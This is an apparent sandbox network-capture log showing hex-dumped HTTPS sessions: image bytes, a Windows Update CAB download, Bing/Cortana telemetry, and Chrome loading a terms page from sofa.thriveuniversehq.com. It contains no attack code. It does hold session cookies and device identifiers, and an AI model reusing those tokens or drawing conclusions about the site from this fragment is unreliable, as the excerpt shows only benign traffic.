                                                          2023-11-27 03:23:55 UTC1369INData Raw: 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 f3 88 88 88 d7 88 88 88 e0 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 86 88 88 88 00 88 88 88 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 00 88 88 88 00 88 88 88 02 88 88 88 ba 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 5d 88 88 88 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 00 88 88 88 00 88 88 88 76 88 88 88 ff 88 88 88 ff 88 88 88 ff 88
                                                          Data Ascii: ]v
                                                          2023-11-27 03:23:55 UTC1369INData Raw: 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 e4 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 43 88 88 88 00 88 88 88 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 cb 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 73 88 88 88 00 88 88 88 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff
                                                          Data Ascii: Cs
                                                          2023-11-27 03:23:55 UTC1369INData Raw: 88 88 88 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 61 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 31 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 51 88 88 88 db 88 88 88 ff 88 88 88 65 88 88 88 00 88 88 88 00 88 88 88
                                                          Data Ascii: a1Qe
                                                          2023-11-27 03:23:55 UTC1369INData Raw: ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00
                                                          Data Ascii:
                                                          2023-11-27 03:23:55 UTC1369INData Raw: ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff
                                                          Data Ascii:
                                                          2023-11-27 03:23:55 UTC1369INData Raw: 00 88 88 88 00 88 88 88 67 88 88 88 fc 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 fa 88 88 88 bf 88 88 88 89 88 88 88 71 88 88 88 6d 88 88 88 7c 88 88 88 a6 88 88 88 e7 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ad 88 88 88 0d 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88
                                                          Data Ascii: gqm|
                                                          2023-11-27 03:23:55 UTC1369INData Raw: 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ae 88 88 88 00 88 88 88 00 88 88 88 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 10 88 88 88 dd 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88
                                                          Data Ascii:


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          41192.168.2.54976220.12.23.50443
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:57 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=T4Ff3c4fF5lNSMx&MD=h18rKTBt HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                          Host: slscr.update.microsoft.com
                                                          2023-11-27 03:23:57 UTC560INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 45 78 70 69 72 65 73 3a 20 2d 31 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 30 30 30 31 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 58 41 6f 70 61 7a 56 30 30 58 44 57 6e 4a 43 77 6b 6d 45 57 52 76 36 4a 6b 62 6a 52 41 39 51 53 53 5a 32 2b 65 2f 33 4d 7a 45 6b 3d 5f 32 38 38 30 22 0d 0a 4d 53 2d 43 6f 72 72 65 6c 61 74 69 6f 6e 49 64 3a 20 31 38 31 35 32 64 32 38 2d 63 33 34 64 2d 34 64 65 30 2d
                                                          Data Ascii: HTTP/1.1 200 OKCache-Control: no-cachePragma: no-cacheContent-Type: application/octet-streamExpires: -1Last-Modified: Mon, 01 Jan 0001 00:00:00 GMTETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"MS-CorrelationId: 18152d28-c34d-4de0-
                                                          2023-11-27 03:23:57 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                          2023-11-27 03:23:57 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          42192.168.2.54976823.1.237.91443
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:58 UTC2148OUTPOST /threshold/xls.aspx HTTP/1.1
                                                          Origin: https://www.bing.com
                                                          Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                          Accept: */*
                                                          Accept-Language: en-CH
                                                          Content-type: text/xml
                                                          X-Agent-DeviceId: 01000A410900D492
                                                          X-BM-CBT: 1696428841
                                                          X-BM-DateFormat: dd/MM/yyyy
                                                          X-BM-DeviceDimensions: 784x984
                                                          X-BM-DeviceDimensionsLogical: 784x984
                                                          X-BM-DeviceScale: 100
                                                          X-BM-DTZ: 120
                                                          X-BM-Market: CH
                                                          X-BM-Theme: 000000;0078d7
                                                          X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                          X-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22
                                                          X-Device-isOptin: false
                                                          X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                          X-Device-OSSKU: 48
                                                          X-Device-Touch: false
                                                          X-DeviceID: 01000A410900D492
                                                          X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticsh
                                                          X-MSEdge-ExternalExpType: JointCoord
                                                          X-PositionerType: Desktop
                                                          X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                          X-Search-CortanaAvailableCapabilities: None
                                                          X-Search-SafeSearch: Moderate
                                                          X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                          X-UserAgeClass: Unknown
                                                          Accept-Encoding: gzip, deflate, br
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                          Host: www.bing.com
                                                          Content-Length: 2483
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Cookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1701055406023&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
                                                          2023-11-27 03:23:58 UTC1OUTData Raw: 3c
                                                          Data Ascii: <
                                                          2023-11-27 03:23:58 UTC2482OUTData Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 33 36 34 34 46 44 37 34 44 46 31 36 36 31 38 46 30 38 46 37 45 43 30 33 44 45 35 35 36 30 30 31 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 37 35 32 32 38 31 35 36 37 30 33 41 34 30 44 35 42 39 37 45 35 41 36 38 33 36 46 32 41 31 43 45 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49
                                                          Data Ascii: ClientInstRequest><CID>3644FD74DF16618F08F7EC03DE556001</CID><Events><E><T>Event.ClientInst</T><IG>75228156703A40D5B97E5A6836F2A1CE</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
                                                          2023-11-27 03:23:58 UTC476INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 34 20 4e 6f 20 43 6f 6e 74 65 6e 74 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 63 63 65 70 74 2d 43 48 3a 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 62 69 6c 65 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 0d 0a 58 2d 4d 53 45 64 67 65 2d 52 65 66 3a 20 52 65
                                                          Data Ascii: HTTP/1.1 204 No ContentAccess-Control-Allow-Origin: *Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionX-MSEdge-Ref: Re


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          43192.168.2.549770104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:24:00 UTC807OUTGET /s3/terms/terms.php HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-Dest: document
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
                                                          2023-11-27 03:24:00 UTC611INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 34 3a 30 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:24:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/
                                                          2023-11-27 03:24:00 UTC758INData Raw: 36 65 36 65 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 61 72 63 68 69 76 65 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 73 6f 66 61 2e 74 68 72 69 76 65 75 6e 69 76 65 72 73 65 68 71 2e 63 6f 6d 3c 2f 70 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 54 65 72 6d 73 20 61 6e 64 20 43 6f 6e 64 69 74 69 6f 6e 73 20 6f 66 20 55 73 65 20 61
                                                          Data Ascii: 6e6e<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><meta name="robots" content="noindex,nofollow,noarchive"></head><body><p dir="ltr">sofa.thriveuniversehq.com</p><p dir="ltr">Terms and Conditions of Use a
                                                          2023-11-27 03:24:00 UTC1369INData Raw: 2e 63 6f 6d 2c 20 61 73 20 69 73 20 61 70 70 72 6f 70 72 69 61 74 65 20 69 6e 20 74 68 65 20 63 6f 6e 74 65 78 74 20 6f 66 20 74 68 65 20 75 73 65 20 6f 66 20 74 68 65 20 77 6f 72 64 73 2e 20 4c 69 6b 65 77 69 73 65 2c 20 74 68 65 20 77 6f 72 64 73 20 22 79 6f 75 22 20 61 6e 64 20 22 79 6f 75 72 22 0a 09 72 65 66 65 72 20 74 6f 20 79 6f 75 2c 20 74 68 65 20 70 65 72 73 6f 6e 20 77 68 6f 20 69 73 20 62 65 69 6e 67 20 70 72 65 73 65 6e 74 65 64 20 77 69 74 68 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 66 6f 72 20 79 6f 75 72 20 61 67 72 65 65 6d 65 6e 74 2e 0a 3c 2f 70 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 41 63 63 65 73 73 69 6e 67 20 74 68 65 20 53 69 74 65 2c 20 69 6e 20 61 6e 79 20 6d 61 6e 6e 65 72 2c 20 77 68 65 74 68 65 72 20 61 75 74
                                                          Data Ascii: .com, as is appropriate in the context of the use of the words. Likewise, the words "you" and "your"refer to you, the person who is being presented with this document for your agreement.</p><p dir="ltr">Accessing the Site, in any manner, whether aut
                                                          2023-11-27 03:24:00 UTC1369INData Raw: 64 20 75 73 65 20 6f 66 20 70 65 72 73 6f 6e 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 66 72 6f 6d 20 63 68 69 6c 64 72 65 6e 20 75 6e 64 65 72 20 74 68 65 20 61 67 65 0a 09 6f 66 20 74 68 69 72 74 65 65 6e 2c 20 61 6e 64 20 70 72 6f 76 69 64 65 73 20 69 6d 70 6f 72 74 61 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 72 65 67 61 72 64 69 6e 67 20 74 68 65 69 72 20 72 69 67 68 74 73 20 75 6e 64 65 72 20 66 65 64 65 72 61 6c 20 6c 61 77 20 77 69 74 68 20 72 65 73 70 65 63 74 20 74 6f 20 73 75 63 68 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 75 6c 3e 0a 09 3c 6c 69 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 09 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 09 09 54 68 69 73 20 53 69 74 65 20 69 73 20 6e 6f 74 20 64 69 72 65 63 74
                                                          Data Ascii: d use of personal information from children under the ageof thirteen, and provides important information regarding their rights under federal law with respect to such information.</p><br><ul><li dir="ltr"><p dir="ltr">This Site is not direct
                                                          2023-11-27 03:24:00 UTC1369INData Raw: 20 6f 72 20 6f 74 68 65 72 77 69 73 65 20 64 69 73 74 72 69 62 75 74 65 20 70 65 72 73 6f 6e 61 6c 6c 79 20 69 64 65 6e 74 69 66 69 61 62 6c 65 20 63 6f 6e 74 61 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 09 09 09 74 68 72 6f 75 67 68 20 74 68 65 20 53 69 74 65 2e 0a 09 09 3c 2f 70 3e 0a 09 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 09 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 09 09 42 65 63 61 75 73 65 20 77 65 20 64 6f 20 6e 6f 74 20 63 6f 6c 6c 65 63 74 20 61 6e 79 20 70 65 72 73 6f 6e 61 6c 6c 79 20 69 64 65 6e 74 69 66 69 61 62 6c 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 66 72 6f 6d 20 63 68 69 6c 64 72 65 6e 20 75 6e 64 65 72 20 74 68 65 20 61 67 65 20 6f 66 20 74 68 69 72 74 65 65 6e 20 61 73 20 70 61 72 74 20 6f 66
                                                          Data Ascii: or otherwise distribute personally identifiable contact informationthrough the Site.</p></li><li dir="ltr"><p dir="ltr">Because we do not collect any personally identifiable information from children under the age of thirteen as part of
                                                          2023-11-27 03:24:00 UTC1369INData Raw: 74 65 0a 09 66 6f 72 20 79 6f 75 72 20 70 65 72 73 6f 6e 61 6c 2c 20 6e 6f 6e 2d 63 6f 6d 6d 65 72 63 69 61 6c 20 75 73 65 2c 20 70 72 6f 76 69 64 65 64 20 74 68 61 74 20 79 6f 75 20 6b 65 65 70 20 69 6e 74 61 63 74 20 61 6c 6c 20 63 6f 70 79 72 69 67 68 74 20 61 6e 64 20 6f 74 68 65 72 20 70 72 6f 70 72 69 65 74 61 72 79 20 6e 6f 74 69 63 65 73 2e 0a 3c 2f 70 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 54 68 65 20 74 72 61 64 65 20 6e 61 6d 65 73 20 61 6e 64 20 74 72 61 64 65 6d 61 72 6b 73 20 6f 66 20 74 68 65 20 70 65 72 73 6f 6e 73 20 6f 72 20 65 6e 74 69 74 69 65 73 20 72 65 66 65 72 72 65 64 20 74 6f 20 69 6e 20 6f 75 72 20 61 64 76 65 72 74 69 73 65 6d 65 6e 74 73 20 61 72 65 20 6f 77 6e 65 64 20 62 79 20 74 68 6f 73 65 20 65 6e 74 69 74 69
                                                          Data Ascii: tefor your personal, non-commercial use, provided that you keep intact all copyright and other proprietary notices.</p><p dir="ltr">The trade names and trademarks of the persons or entities referred to in our advertisements are owned by those entiti
